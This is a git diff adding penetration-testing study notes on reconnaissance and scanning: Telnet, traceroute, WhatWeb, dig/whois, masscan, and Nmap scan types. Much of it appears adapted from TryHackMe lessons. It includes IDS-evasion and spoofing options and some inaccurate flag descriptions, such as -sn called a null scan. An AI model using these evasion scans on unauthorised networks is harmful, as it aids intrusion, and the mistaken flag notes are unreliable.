+1,21 @@ +## what is Telnet? +Telnet is a network protocol used to provide remote access to a device over a network connection. It allows a user to connect to and interact with a remote device as if they were physically present at the device's console. Telnet is commonly used for remote management of devices such as routers, switches, and servers. + +## Common use and commands: +The most common use of Telnet is to establish a connection to a remote device's command-line interface (CLI). To do so, the user opens a Telnet client application and enters the IP address or hostname of the remote device. Once the connection is established, the user can enter commands as if they were sitting at the device's console. + +However, the telnet client, with its simplicity, can be used for other purposes. Knowing that telnet client relies on the TCP protocol, you can use Telnet to connect to any service and grab its banner. Using `telnet MACHINE_IP PORT`, you can connect to any service running on TCP and even exchange a few messages unless it uses encryption. + +- example + Let’s say we want to discover more information about a web server, listening on port 80. We connect to the server at port 80, and then we communicate using the HTTP protocol. You don’t need to dive into the HTTP protocol; you just need to issue `GET / HTTP/1.1`. To specify something other than the default index page, you can issue `GET /page.html HTTP/1.1`, which will request `page.html`. We also specified to the remote web server that we want to use HTTP version 1.1 for communication. To get a valid response, instead of an error, you need to input some value for the host `host: example` and hit enter twice. Executing these steps will provide the requested index page. + + ![[Screenshot_2022-09-01_22-13-27.png]] + +Telnet +```Terminal +Telnet IP PORT +``` + +## More Information +For more information on Telnet, including how to configure Telnet clients and troubleshoot Telnet connections, users can refer to the tool's documentation or online resources such as TechTarget or Cisco's website. Additionally, the source code for many Telnet clients and servers is available on GitHub: [https://github.com/topics/telnet](https://github.com/topics/telnet). + diff --git a/tools/1.Information-Gathering/2.Active-Reconnaissance/Traceroute.md b/tools/1.Information-Gathering/2.Active-Reconnaissance/Traceroute.md new file mode 100644 index 0000000..6110fac --- /dev/null +++ b/tools/1.Information-Gathering/2.Active-Reconnaissance/Traceroute.md @@ -0,0 +1,112 @@ +## What is Traceroute? + +Traceroute is a network diagnostic tool used to trace the path that an IP packet takes from the local device to a remote device over a network. It sends a sequence of packets to the remote device and records the time it takes for each packet to travel from one device to the next, providing information on the routing path and network latency. + +## Common use and commands: +To use Traceroute, simply open a command prompt or terminal and type "traceroute" followed by the IP address or domain name of the remote device. The tool will send packets with increasing Time-To-Live (TTL) values and report the results, including the IP addresses of each device that handles the packets along the way and the round-trip time (RTT) for each packet. + +Traceroute +```Terminal +traceroute IP +``` + +## How does Traceroute work? +The internet is made up of many, many different servers and end-points, all networked up to each other. This means that, in order to get to the content you actually want, you first need to go through a bunch of other servers. Traceroute allows you to see each of these connections -- it allows you to see every intermediate step between your computer and the resource that you requested. The basic syntax for traceroute on Linux is this: `traceroute ` + +By default, the Windows traceroute utility (`tracert`) operates using the same ICMP protocol that ping utilises, and the Unix equivalent operates over UDP. This can be altered with switches in both instances. + +![Performing a traceroute to Google.com](https://muirlandoracle.co.uk/wp-content/uploads/2020/03/image-15.png) + +You can see that it took 13 hops to get from my router (`_gateway`) to the Google server at 216.58.205.46 + +## More Information +For more information on Traceroute, including additional commands and options, users can refer to the tool's documentation or the GitHub repository: [https://github.com/iputils/iputils](https://github.com/iputils/iputils). + +- More information + As the name suggests, the traceroute command _traces the route_ taken by the packets from your system to another host. The purpose of a traceroute is to find the IP addresses of the routers or hops that a packet traverses as it goes from your system to a target host. This command also reveals the number of routers between the two systems. It is helpful as it indicates the number of hops (routers) between your system and the target host. However, note that the route taken by the packets might change as many routers use dynamic routing protocols that adapt to network changes. + + On Linux and macOS, the command to use is `traceroute MACHINE_IP`, and on MS Windows, it is `tracert MACHINE_IP`. `traceroute` tries to discover the routers across the path from your system to the target system. + + There is no direct way to discover the path from your system to a target system. We rely on ICMP to “trick” the routers into revealing their IP addresses. We can accomplish this by using a small Time To Live (TTL) in the IP header field. Although the T in TTL stands for time, TTL indicates the maximum number of routers/hops that a packet can pass through before being dropped; TTL is not a maximum number of time units. When a router receives a packet, it decrements the TTL by one before passing it to the next router. The following figure shows that each time the IP packet passes through a router, its TTL value is decremented by 1. Initially, it leaves the system with a TTL value of 64; it reaches the target system with a TTL value of 60 after passing through 4 routers. + + ![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/e82c42dcfae78ac592a8d7843465d2d6.png) + + However, if the TTL reaches 0, it will be dropped, and an ICMP Time-to-Live exceeded would be sent to the original sender. In the following figure, the system set TTL to 1 before sending it to the router. The first router on the path decrements the TTL by 1, resulting in a TTL of 0. Consequently, this router will discard the packet and send an ICMP time exceeded in-transit error message. Note that some routers are configured not to send such ICMP messages when discarding a packet. + + ![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/948388c823b156813fa30225c2fa3f05.png) + + On Linux, `traceroute` will start by sending UDP datagrams within IP packets of TTL being 1. Thus, it causes the first router to encounter a TTL=0 and send an ICMP Time-to-Live exceeded back. Hence, a TTL of 1 will reveal the IP address of the first router to you. Then it will send another packet with TTL=2; this packet will be dropped at the second router. And so on. Let’s try this on live systems. + + In the following examples, we run the same command, `traceroute tryhackme.com` from TryHackMe’s AttackBox. We notice that different runs might lead to different routes taken by the packets. + + Traceroute A + + AttackBox Terminal - Traceroute A + + ```shell-session + user@AttackBox$ traceroute tryhackme.com + traceroute to tryhackme.com (172.67.69.208), 30 hops max, 60 byte packets + 1 ec2-3-248-240-5.eu-west-1.compute.amazonaws.com (3.248.240.5) 2.663 ms * ec2-3-248-240-13.eu-west-1.compute.amazonaws.com (3.248.240.13) 7.468 ms + 2 100.66.8.86 (100.66.8.86) 43.231 ms 100.65.21.64 (100.65.21.64) 18.886 ms 100.65.22.160 (100.65.22.160) 14.556 ms + 3 * 100.66.16.176 (100.66.16.176) 8.006 ms * + 4 100.66.11.34 (100.66.11.34) 17.401 ms 100.66.10.14 (100.66.10.14) 23.614 ms 100.66.19.236 (100.66.19.236) 17.524 ms + 5 100.66.7.35 (100.66.7.35) 12.808 ms 100.66.6.109 (100.66.6.109) 14.791 ms * + 6 100.65.14.131 (100.65.14.131) 1.026 ms 100.66.5.189 (100.66.5.189) 19.246 ms 100.66.5.243 (100.66.5.243) 19.805 ms + 7 100.65.13.143 (100.65.13.143) 14.254 ms 100.95.18.131 (100.95.18.131) 0.944 ms 100.95.18.129 (100.95.18.129) 0.778 ms + 8 100.95.2.143 (100.95.2.143) 0.680 ms 100.100.4.46 (100.100.4.46) 1.392 ms 100.95.18.143 (100.95.18.143) 0.878 ms + 9 100.100.20.76 (100.100.20.76) 7.819 ms 100.92.11.36 (100.92.11.36) 18.669 ms 100.100.20.26 (100.100.20.26) 0.842 ms + 10 100.92.11.112 (100.92.11.112) 17.852 ms * 100.92.11.158 (100.92.11.158) 16.687 ms + 11 100.92.211.82 (100.92.211.82) 19.713 ms 100.92.0.126 (100.92.0.126) 18.603 ms 52.93.112.182 (52.93.112.182) 17.738 ms + 12 99.83.69.207 (99.83.69.207) 17.603 ms 15.827 ms 17.351 ms + 13 100.92.9.83 (100.92.9.83) 17.894 ms 100.92.79.136 (100.92.79.136) 21.250 ms 100.92.9.118 (100.92.9.118) 18.166 ms + 14 172.67.69.208 (172.67.69.208) 17.976 ms 16.945 ms 100.92.9.3 (100.92.9.3) 17.709 ms + ``` + + In the traceroute output above, we have 14 numbered lines; each line represents one router/hop. Our system sends three packets with TTL set to 1, then three packets with TTL set to 2, and so forth. Depending on the network topology, we might get replies from up to 3 different routers, depending on the route taken by the packet. Consider line number 12, the twelfth router with the listed IP address has dropped the packet three times and sent an ICMP time exceeded in-transit message. The line `12 99.83.69.207 (99.83.69.207) 17.603 ms 15.827 ms 17.351 ms` shows the time in milliseconds for each reply to reach our system. + + On the other hand, we can see that we received only a single reply on the third line. The two stars in the output `3 * 100.66.16.176 (100.66.16.176) 8.006 ms *` indicate that our system didn’t receive two expected ICMP time exceeded in-transit messages. + + Finally, in the first line of the output, we can see that the packets leaving the AttackBox take different routes. We can see two routers that responded to TTL being one. Our system never received the third expected ICMP message. + + Traceroute B + + AttackBox Terminal - Traceroute B + + ```shell-session + user@AttackBox$ traceroute tryhackme.com + traceroute to tryhackme.com (104.26.11.229), 30 hops max, 60 byte packets + 1 ec2-79-125-1-9.eu-west-1.compute.amazonaws.com (79.125.1.9) 1.475 ms * ec2-3-248-240-31.eu-west-1.compute.amazonaws.com (3.248.240.31) 9.456 ms + 2 100.65.20.160 (100.65.20.160) 16.575 ms 100.66.8.226 (100.66.8.226) 23.241 ms 100.65.23.192 (100.65.23.192) 22.267 ms + 3 100.66.16.50 (100.66.16.50) 2.777 ms 100.66.11.34 (100.66.11.34) 22.288 ms 100.66.16.28 (100.66.16.28) 4.421 ms + 4 100.66.6.47 (100.66.6.47) 17.264 ms 100.66.7.161 (100.66.7.161) 39.562 ms 100.66.10.198 (100.66.10.198) 15.958 ms + 5 100.66.5.123 (100.66.5.123) 20.099 ms 100.66.7.239 (100.66.7.239) 19.253 ms 100.66.5.59 (100.66.5.59) 15.397 ms + 6 * 100.66.5.223 (100.66.5.223) 16.172 ms 100.65.15.135 (100.65.15.135) 0.424 ms + 7 100.65.12.135 (100.65.12.135) 0.390 ms 100.65.12.15 (100.65.12.15) 1.045 ms 100.65.14.15 (100.65.14.15) 1.036 ms + 8 100.100.4.16 (100.100.4.16) 0.482 ms 100.100.20.122 (100.100.20.122) 0.795 ms 100.95.2.143 (100.95.2.143) 0.827 ms + 9 100.100.20.86 (100.100.20.86) 0.442 ms 100.100.4.78 (100.100.4.78) 0.347 ms 100.100.20.20 (100.100.20.20) 1.388 ms + 10 100.92.212.20 (100.92.212.20) 11.611 ms 100.92.11.54 (100.92.11.54) 12.675 ms 100.92.11.56 (100.92.11.56) 10.835 ms + 11 100.92.6.52 (100.92.6.52) 11.427 ms 100.92.6.50 (100.92.6.50) 11.033 ms 100.92.210.50 (100.92.210.50) 10.551 ms + 12 100.92.210.139 (100.92.210.139) 10.026 ms 100.92.6.13 (100.92.6.13) 14.586 ms 100.92.210.69 (100.92.210.69) 12.032 ms + 13 100.92.79.12 (100.92.79.12) 12.011 ms 100.92.79.68 (100.92.79.68) 11.318 ms 100.92.80.84 (100.92.80.84) 10.496 ms + 14 100.92.9.27 (100.92.9.27) 11.354 ms 100.92.80.31 (100.92.80.31) 13.000 ms 52.93.135.125 (52.93.135.125) 11.412 ms + 15 150.222.241.85 (150.222.241.85) 9.660 ms 52.93.135.81 (52.93.135.81) 10.941 ms 150.222.241.87 (150.222.241.87) 16.543 ms + 16 100.92.228.102 (100.92.228.102) 15.168 ms 100.92.227.41 (100.92.227.41) 10.134 ms 100.92.227.52 (100.92.227.52) 11.756 ms + 17 100.92.232.111 (100.92.232.111) 10.589 ms 100.92.231.69 (100.92.231.69) 16.664 ms 100.92.232.37 (100.92.232.37) 13.089 ms + 18 100.91.205.140 (100.91.205.140) 11.551 ms 100.91.201.62 (100.91.201.62) 10.246 ms 100.91.201.36 (100.91.201.36) 11.368 ms + 19 100.91.205.79 (100.91.205.79) 11.112 ms 100.91.205.83 (100.91.205.83) 11.040 ms 100.91.205.33 (100.91.205.33) 10.114 ms + 20 100.91.211.45 (100.91.211.45) 9.486 ms 100.91.211.79 (100.91.211.79) 13.693 ms 100.91.211.47 (100.91.211.47) 13.619 ms + 21 100.100.6.81 (100.100.6.81) 11.522 ms 100.100.68.70 (100.100.68.70) 10.181 ms 100.100.6.21 (100.100.6.21) 11.687 ms + 22 100.100.65.131 (100.100.65.131) 10.371 ms 100.100.92.6 (100.100.92.6) 10.939 ms 100.100.65.70 (100.100.65.70) 23.703 ms + 23 100.100.2.74 (100.100.2.74) 15.317 ms 100.100.66.17 (100.100.66.17) 11.492 ms 100.100.88.67 (100.100.88.67) 35.312 ms + 24 100.100.16.16 (100.100.16.16) 19.155 ms 100.100.16.28 (100.100.16.28) 19.147 ms 100.100.2.68 (100.100.2.68) 13.718 ms + 25 99.83.89.19 (99.83.89.19) 28.929 ms * 21.790 ms + 26 104.26.11.229 (104.26.11.229) 11.070 ms 11.058 ms 11.982 ms + ``` + + In the second run of the traceroute program, we noticed that the packets took a longer route this time, passing through 26 routers. If you are running a traceroute to a system within your network, the route will be unlikely to change. However, we cannot expect the route to remain fixed when the packets need to go via other routers outside our network. + + To summarize, we can notice the following: + + - The number of hops/routers between your system and the target system depends on the time you are running traceroute. There is no guarantee that your packets will always follow the same route, even if you are on the same network or you repeat the traceroute command within a short time. + - Some routers return a public IP address. You might examine a few of these routers based on the scope of the intended penetration testing. + - Some routers don’t return a reply. \ No newline at end of file diff --git a/tools/1.Information-Gathering/2.Active-Reconnaissance/Whatweb.md b/tools/1.Information-Gathering/2.Active-Reconnaissance/Whatweb.md new file mode 100644 index 0000000..2916fee --- /dev/null +++ b/tools/1.Information-Gathering/2.Active-Reconnaissance/Whatweb.md @@ -0,0 +1,32 @@ +## What is WhatWeb? + +WhatWeb is an open-source tool used for fingerprinting web technologies utilized by a website. It analyzes the HTTP headers, HTML content, and other aspects of a web page to identify the software and frameworks being used, such as CMS platforms, server types, JavaScript libraries, and more. + +## Common Use and Commands: + +WhatWeb is commonly used by security professionals and web developers to gather information about a target website's technology stack. To utilize WhatWeb, follow these steps: + +```Terminal +whatweb [OPTIONS] TARGET_URL +``` + +Common options include: +- `-v`: Verbose mode, providing more detailed output. +- `-a`: Aggressive mode, increasing the intensity of detection. +- `-i`: Ignore IP addresses in URLs. +- `-l`: Limit requests to a specific URL or directory. + +Example: +```Terminal +whatweb -v example.com +``` + +Output may include: +- Detected CMS platforms (e.g., WordPress, Joomla). +- Server information (e.g., Apache, Nginx). +- JavaScript libraries and frameworks. +- Security headers and configurations. + +## More Information: + +For additional details on WhatWeb and its usage, users can refer to the tool's documentation or visit the official website. Additionally, the source code for WhatWeb is available on GitHub: [https://github.com/urbanadventurer/WhatWeb](https://github.com/urbanadventurer/WhatWeb). diff --git a/tools/1.Information-Gathering/Global-Steps.md b/tools/1.Information-Gathering/Global-Steps.md new file mode 100644 index 0000000..3c4f710 --- /dev/null +++ b/tools/1.Information-Gathering/Global-Steps.md @@ -0,0 +1,53 @@ +## Start with passive reconnaissance +Gather as much information as possible about the target system using passive methods, such as DNS queries, ping, and WHOIS lookups. This will help you identify potential targets, hosts, and other useful information about the system. Some tools that you can use include: + +- DNS: Use tools like `dig`, `dnsdumper`, `nslookup`, `shodan`, and SSL/TLS certificates to gather information about the target's DNS records, SSL/TLS certificates, and other network-related information. + +- Ping: Use the `ping` command to identify the IP address of the target system and its time-to-live (TTL) value, which can help you identify the type of operating system and network architecture in use. + +- WHOIS: Use the `whois` command to gather information about the domain name, such as registration details, owner information, and contact details. + +## Active Reconnaissance +Once you have gathered enough information about the target system, you can move on to active reconnaissance. This involves using tools that actively scan the target network to identify vulnerabilities and potential entry points. Some tools that you can use include: + +- AMASS: This tool is used to discover subdomains and gather information about them. You can use it to search for DNS records, IP addresses, and other network-related information. + +- Netcat: This tool is used to create TCP/UDP connections between two hosts, and can be used to test for open ports, perform banner grabbing, and other tasks. + +- Telnet: This tool is used to connect to remote hosts and execute commands on them. It can be used to test for open ports, brute force passwords, and other tasks. + +- Traceroute: This tool is used to trace the path that network packets take from the source to the destination. It can be used to identify routers, firewalls, and other network devices in the path. + +## Put it all together +Once you have gathered all the information you need using both passive and active reconnaissance, you can use this information to plan your attack. Use the information you have gathered to identify potential vulnerabilities, entry points, and other weaknesses in the system. You can then use this information to launch targeted attacks and gain access to the system. + + +

Global Steps

+ +Whois Records +``` +whois DOMAIN +``` + +NameServer (From Whois Record) ---> Manual Way +``` +dig +short @NAME-SERVER A DOMAIN +dig +short @NAME-SERVER MX DOMAIN +dig +short @NAME-SERVER ... DOMAIN +``` + +NameServer Enumeration (From Whois Record) ---> Automated Way +``` +sudo nmap --dns-servers NAME-SERVER(Without @) --script dns-brute --script-args dns-brute.domain=DOMAIN +``` + +- Possible to add a specific wordlist + +Osint Enumeration +``` +# Osint Enumeration +AMASS +DNSdumper +crt.sh +... +``` \ No newline at end of file diff --git a/tools/2.Scanning-and-Enumeration/1.Scanner/Mass-Scan.md b/tools/2.Scanning-and-Enumeration/1.Scanner/Mass-Scan.md new file mode 100644 index 0000000..5ba98b3 --- /dev/null +++ b/tools/2.Scanning-and-Enumeration/1.Scanner/Mass-Scan.md @@ -0,0 +1,26 @@ +## What is Mass Scan? +Mass Scan is an open-source tool used for network scanning and port discovery. It is designed to quickly scan large networks for open ports and services, and generate reports on the identified vulnerabilities. + +Mass Scan works by sending packets to the target network and analyzing the responses to determine which ports are open and which services are running. It supports both TCP and UDP protocols and can scan large networks with high speed and accuracy. + +## Common Use and Commands: +Mass Scan is commonly used by network administrators and security professionals to identify potential vulnerabilities in their networks and secure them from potential threats. + +The following are some common commands used in Mass Scan: + +``` +- masscan -p ---> Scan a single IP address +- masscan -p ---> Scan a range of IP addresses +- masscan -p ---> Scan a subnet +- masscan -p 1-65535 ---> Scan all ports on a target +- masscan --exclude-ports ---> Exclude certain ports from scan +- masscan -p --rate=1000(ex) ---> Set rate to make it scan faster +- masscan -p --randomize-hosts ---> Randomise host (spoof request) +- masscan /8 -p ---> Will scan all computers on network +``` + +Mass Scan supports various options and flags that can be used to customize the scan, such as setting the rate of packets per second, specifying the output format, and enabling OS detection. + +--- +## More Information +For more information on Mass Scan, including the latest updates and documentation, please visit the project's official website: https://github.com/robertdavidgraham/masscan diff --git a/tools/2.Scanning-and-Enumeration/1.Scanner/Nmap/Commands.md b/tools/2.Scanning-and-Enumeration/1.Scanner/Nmap/Commands.md new file mode 100644 index 0000000..e7970b9 --- /dev/null +++ b/tools/2.Scanning-and-Enumeration/1.Scanner/Nmap/Commands.md @@ -0,0 +1,63 @@ +## What is Nmap? +Nmap (Network Mapper) is a popular open-source tool used for network exploration and security auditing. It is designed to scan large networks and identify potential vulnerabilities and security risks. + +Nmap works by sending packets to target hosts and analyzing the responses to determine which ports are open, which services are running, and which operating systems are being used. It can also perform various advanced scans, such as OS detection, version detection, and service fingerprinting. + +## Common Use and Commands: +Nmap is commonly used by security professionals, system administrators, and penetration testers to scan networks and identify potential vulnerabilities and security issues. + +The following are some common commands used in Nmap: + +Usual Commands +``` +#First Scan +nmap -ip + +#Second Scan (Normal) +nmap -sC -sV -A IP -p (PORT FOUND) --min-rate=9856 + +#Second Scan (Hidding) +nmap -sC -sV -A -f IP -p (PORT FOUND) --min-rate=9856 --data-length 25 +``` + +Additional Commands +``` +-sT ---> TCP +-sU ---> UDP + +-sC ---> Scan Script (Run default script) +-sV ---> Find port version +-sS ---> +-sA ---> Check Firewall filter +-iL ---> Scan from list.txt IP +-O ---> OS Dectection +-A ---> Enable OS detection, version detection... +-D RND:NUMBER ---> Create X diff IP adresse that will scan (ex: 10 different host) + +-sn ---> Send null package (HIDING) +-Pn ---> Dont ping + +-f ---> Fragment parkets (Try to be undetectable) +--min-rate=9856 ---> Send packets at the rate of 9956 per second +--data-length 25 ---> add garbage data to packets (Avoid IPS/IDS signature) +--spoof-mac ---> Try to spoof address (Work localy) +--source-port X ---> Change the source port for scanning (spoof source port) + +-oN, -oG, -oX ---> Export Format + +/24 ---> Check all 10.0.1.HERE +/16 ---> Check all 10.0.HERE.HERE +``` + +- Options + - Timing ---> T0-T5 (0=Paranoid and 5=Insane Fast) + - Parelel ---> Use --source-port 80 (Will act like http request) + - Random Scanning ---> Use nmap IP/24 --randomize-hosts + - MAC Adress Spoofing ---> Nmap IP --spoof-mac (X) + - Send Bad Checksums ---> Nmap IP --badsum + +Nmap supports various options and flags that can be used to customize the scan and generate detailed reports, such as setting the output format, enabling verbose logging, and excluding certain hosts or ports. + +## More Information +For more information on Nmap, including the latest updates and documentation, please visit the project's official website: https://nmap.org/ + diff --git a/tools/2.Scanning-and-Enumeration/1.Scanner/Nmap/More-Information.md b/tools/2.Scanning-and-Enumeration/1.Scanner/Nmap/More-Information.md new file mode 100644 index 0000000..d086791 --- /dev/null +++ b/tools/2.Scanning-and-Enumeration/1.Scanner/Nmap/More-Information.md @@ -0,0 +1,401 @@ +## Type of Scan + +- TCP Scan + +To understand TCP Connect scans (`-sT`), it's important that you're comfortable with the _TCP three-way handshake_. If this term is new to you then completing [Introductory Networking](https://tryhackme.com/room/introtonetworking) before continuing would be advisable. + +As a brief recap, the three-way handshake consists of three stages. First the connecting terminal (our attacking machine, in this instance) sends a TCP request to the target server with the SYN flag set. The server then acknowledges this packet with a TCP response containing the SYN flag, as well as the ACK flag. Finally, our terminal completes the handshake by sending a TCP request with the ACK flag set. +![](https://muirlandoracle.co.uk/wp-content/uploads/2020/03/image-2.png) +![](https://i.imgur.com/ngzBWID.png) + +This is one of the fundamental principles of TCP/IP networking, but how does it relate to Nmap? + +Well, as the name suggests, a TCP Connect scan works by performing the three-way handshake with each target port in turn. In other words, Nmap tries to connect to each specified TCP port, and determines whether the service is open by the response it receives. + + +#### SYN Scan + +As with TCP scans, SYN scans (`-sS`) are used to scan the TCP port-range of a target or targets; however, the two scan types work slightly differently. SYN scans are sometimes referred to as "_Half-open"_ scans, or _"Stealth"_ scans. + +Where TCP scans perform a full three-way handshake with the target, SYN scans sends back a RST TCP packet after receiving a SYN/ACK from the server (this prevents the server from repeatedly trying to make the request). In other words, the sequence for scanning an **open** port looks like this: + +![](https://i.imgur.com/cPzF0kU.png) + +![](https://i.imgur.com/bcgeZmI.png) + +This has a variety of advantages for us as hackers: + +- It can be used to bypass older Intrusion Detection systems as they are looking out for a full three way handshake. This is often no longer the case with modern IDS solutions; it is for this reason that SYN scans are still frequently referred to as "stealth" scans. +- SYN scans are often not logged by applications listening on open ports, as standard practice is to log a connection once it's been fully established. Again, this plays into the idea of SYN scans being stealthy. +- Without having to bother about completing (and disconnecting from) a three-way handshake for every port, SYN scans are significantly faster than a standard TCP Connect scan. + +There are, however, a couple of disadvantages to SYN scans, namely: + +- They require sudo permissions[1] in order to work correctly in Linux. This is because SYN scans require the ability to create raw packets (as opposed to the full TCP handshake), which is a privilege only the root user has by default. +- Unstable services are sometimes brought down by SYN scans, which could prove problematic if a client has provided a production environment for the test. + +All in all, the pros outweigh the cons. + +For this reason, SYN scans are the default scans used by Nmap _if run with sudo permissions_. If run **without** sudo permissions, Nmap defaults to the TCP Connect scan we saw in the previous task. + + + +#### UDP Scan + +Unlike TCP, UDP connections are _stateless_. This means that, rather than initiating a connection with a back-and-forth "handshake", UDP connections rely on sending packets to a target port and essentially hoping that they make it. This makes UDP superb for connections which rely on speed over quality (e.g. video sharing), but the lack of acknowledgement makes UDP significantly more difficult (and much slower) to scan. The switch for an Nmap UDP scan is (`-sU`) + +When a packet is sent to an open UDP port, there should be no response. When this happens, Nmap refers to the port as being `open|filtered`. In other words, it suspects that the port is open, but it could be firewalled. If it gets a UDP response (which is very unusual), then the port is marked as _open_. More commonly there is no response, in which case the request is sent a second time as a double-check. If there is still no response then the port is marked _open|filtered_ and Nmap moves on. + +When a packet is sent to a _closed_ UDP port, the target should respond with an ICMP (ping) packet containing a message that the port is unreachable. This clearly identifies closed ports, which Nmap marks as such and moves on. + + +- NULL, FIN, Xmas + +- NULL + +The null scan does not set any flag; all six flag bits are set to zero. You can choose this scan using the `-sN` option. A TCP packet with no flags set will not trigger any response when it reaches an open port, as shown in the figure below. Therefore, from Nmap’s perspective, a lack of reply in a null scan indicates that either the port is open or a firewall is blocking the packet. + +![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/04b178a9cf7048c21256988b8b2343e3.png) + +However, we expect the target server to respond with an RST packet if the port is closed. Consequently, we can use the lack of RST response to figure out the ports that are not closed: open or filtered. + +![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/224e01a913a1ce7b0fb2b9290ff5e1c8.png) + +Below is an example of a null scan against a Linux server. The null scan we carried out has successfully identified the six open ports on the target system. Because the null scan relies on the lack of a response to infer that the port is not closed, it cannot indicate with certainty that these ports are open; there is a possibility that the ports are not responding due to a firewall rule. + +Pentester Terminal + +```shell-session +pentester@TryHackMe$ sudo nmap -sN 10.10.254.161 + +Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:30 BST +Nmap scan report for 10.10.254.161 +Host is up (0.00066s latency). +Not shown: 994 closed ports +PORT STATE SERVICE +22/tcp open|filtered ssh +25/tcp open|filtered smtp +80/tcp open|filtered http +110/tcp open|filtered pop3 +111/tcp open|filtered rpcbind +143/tcp open|filtered imap +MAC Address: 02:45:BF:8A:2D:6B (Unknown) + +Nmap done: 1 IP address (1 host up) scanned in 96.50 seconds +``` + +Note that many Nmap options require root privileges. Unless you are running Nmap as root, you need to use `sudo` as in the example above using the `-sN` option. + + + +#### FIN Scan + +The FIN scan sends a TCP packet with the FIN flag set. You can choose this scan type using the `-sF` option. Similarly, no response will be sent if the TCP port is open. Again, Nmap cannot be sure if the port is open or if a firewall is blocking the traffic related to this TCP port. + +![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/78eb3d6ba158542f2b3223184b032e64.png) + +However, the target system should respond with an RST if the port is closed. Consequently, we will be able to know which ports are closed and use this knowledge to infer the ports that are open or filtered. It's worth noting some firewalls will 'silently' drop the traffic without sending an RST. + +![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/74dc07da7351a5a7f258948ec59efccc.png) + +Below is an example of a FIN scan against a Linux server. The result is quite similar to the result we obtained earlier using a null scan. + +Pentester Terminal + +```shell-session +pentester@TryHackMe$ sudo nmap -sF 10.10.254.161 + +Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:32 BST +Nmap scan report for 10.10.254.161 +Host is up (0.0018s latency). +Not shown: 994 closed ports +PORT STATE SERVICE +22/tcp open|filtered ssh +25/tcp open|filtered smtp +80/tcp open|filtered http +110/tcp open|filtered pop3 +111/tcp open|filtered rpcbind +143/tcp open|filtered imap +MAC Address: 02:45:BF:8A:2D:6B (Unknown) + +Nmap done: 1 IP address (1 host up) scanned in 96.52 seconds +``` + + + +#### Xmas Scan + +The Xmas scan gets its name after Christmas tree lights. An Xmas scan sets the FIN, PSH, and URG flags simultaneously. You can select Xmas scan with the option `-sX`. + +Like the Null scan and FIN scan, if an RST packet is received, it means that the port is closed. Otherwise, it will be reported as open|filtered. + +The following two figures show the case when the TCP port is open and the case when the TCP port is closed. + +![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/7d28b756aed3b6eb72faf98d6974776c.png) + +![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/4304eacbc3db1af21657f285bc16ebce.png) + +The console output below shows an example of a Xmas scan against a Linux server. The obtained results are pretty similar to that of the null scan and the FIN scan. + +Pentester Terminal + +```shell-session +pentester@TryHackMe$ sudo nmap -sX 10.10.254.161 + +Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:34 BST +Nmap scan report for 10.10.254.161 +Host is up (0.00087s latency). +Not shown: 994 closed ports +PORT STATE SERVICE +22/tcp open|filtered ssh +25/tcp open|filtered smtp +80/tcp open|filtered http +110/tcp open|filtered pop3 +111/tcp open|filtered rpcbind +143/tcp open|filtered imap +MAC Address: 02:45:BF:8A:2D:6B (Unknown) + +Nmap done: 1 IP address (1 host up) scanned in 84.85 seconds +``` + +On scenario where these three scan types can be efficient is when scanning a target behind a stateless (non-stateful) firewall. A stateless firewall will check if the incoming packet has the SYN flag set to detect a connection attempt. Using a flag combination that does not match the SYN packet makes it possible to deceive the firewall and reach the system behind it. However, a stateful firewall will practically block all such crafted packets and render this kind of scan useless. +#### ICMP Scan + +On first connection to a target network in a black box assignment, our first objective is to obtain a "map" of the network structure -- or, in other words, we want to see which IP addresses contain active hosts, and which do not. + +One way to do this is by using Nmap to perform a so called "ping sweep". This is exactly as the name suggests: Nmap sends an ICMP packet to each possible IP address for the specified network. When it receives a response, it marks the IP address that responded as being alive. For reasons we'll see in a later task, this is not always accurate; however, it can provide something of a baseline and thus is worth covering. + +To perform a ping sweep, we use the `-sn` switch in conjunction with IP ranges which can be specified with either a hypen (`-`) or CIDR notation. i.e. we could scan the `192.168.0.x` network using: + +- `nmap -sn 192.168.0.1-254` + +or + +- `nmap -sn 192.168.0.0/24` + + + +The `-sn` switch tells Nmap not to scan any ports -- forcing it to rely primarily on ICMP echo packets (or ARP requests on a local network, if run with sudo or directly as the root user) to identify targets. In addition to the ICMP echo requests, the `-sn` switch will also cause nmap to send a TCP SYN packet to port 443 of the target, as well as a TCP ACK (or TCP SYN if not run as root) packet to port 80 of the target. + + +On first connection to a target network in a black box assignment, our first objective is to obtain a "map" of the network structure -- or, in other words, we want to see which IP addresses contain active hosts, and which do not. + +One way to do this is by using Nmap to perform a so called "ping sweep". This is exactly as the name suggests: Nmap sends an ICMP packet to each possible IP address for the specified network. When it receives a response, it marks the IP address that responded as being alive. For reasons we'll see in a later task, this is not always accurate; however, it can provide something of a baseline and thus is worth covering. + +To perform a ping sweep, we use the `-sn` switch in conjunction with IP ranges which can be specified with either a hypen (`-`) or CIDR notation. i.e. we could scan the `192.168.0.x` network using: + +- `nmap -sn 192.168.0.1-254` + +or + +- `nmap -sn 192.168.0.0/24` + +example: netmask 255.255.0.0 ---> NUMBER.NUMBER.0.0/16 +example: netmask 255.255.255.0 ---> Number.Number.Number.0/24 + +The `-sn` switch tells Nmap not to scan any ports -- forcing it to rely primarily on ICMP echo packets (or ARP requests on a local network, if run with sudo or directly as the root user) to identify targets. In addition to the ICMP echo requests, the `-sn` switch will also cause nmap to send a TCP SYN packet to port 443 of the target, as well as a TCP ACK (or TCP SYN if not run as root) packet to port 80 of the target. + +#### Maimon Scan + +Uriel Maimon first described this scan in 1996. In this scan, the FIN and ACK bits are set. The target should send an RST packet as a response. However, certain BSD-derived systems drop the packet if it is an open port exposing the open ports. This scan won’t work on most targets encountered in modern networks; however, we include it in this room to better understand the port scanning 